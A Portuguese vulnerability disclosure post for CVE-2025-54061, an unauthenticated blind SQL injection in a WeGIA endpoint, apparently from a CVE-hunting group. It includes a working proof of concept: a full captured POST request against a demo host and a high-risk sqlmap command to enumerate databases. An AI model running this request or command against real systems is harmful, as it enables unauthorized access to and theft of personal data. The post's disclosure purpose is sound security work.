Featured image of post CVE-2025-54061

CVE-2025-54061

Injeção SQL

CVE-2025-54061: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro idatendido_familiares do Endpoint dependente_editarDoc.php

Publicação CVE: https://www.cve.org/CVERecord?id=CVE-2025-54061

Resumo

Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro idatendido_familiares do endpoint /html/funcionario/dependente_editarDoc.php. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.

Detalhes

O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro idatendido_familiares. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.

PoC

Endpoint Vulnerável: /html/funcionario/dependente_editarDoc.php

Parâmetro: idatendido_familiares

Salve a requisição no arquivo req.txt:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
  POST /html/funcionario/dependente_editarDoc.php?id_pessoa=3&idatendido_familiares=1 HTTP/1.1
  Host: demo.wegia.org
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br, zstd
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 82
  Origin: https://demo.wegia.org
  Connection: keep-alive
  Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1
  Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g0$t1751259204$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=bv1jv0i5nijrv1a3dkkimbp270
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  Priority: u=0, i

  rg=56.242.1&orgao_emissor=Uni%C3%A3o1&data_expedicao=2005-06-06&cpf=495.852.710-95

Então, use o sqlmap:

1
  sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch

Impacto

  • Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).
  • Enumeração de banco de dados (esquemas, tabelas, usuários, versões).
  • Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).
  • Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.
  • Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.

Referência

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-g47q-vfpj-g9mr

Encontrado por

Marcelo Queiroz

Colaborador

Natan Maia Morette

By: CVE-Hunters

Built with Hugo
Theme Stack designed by Jimmy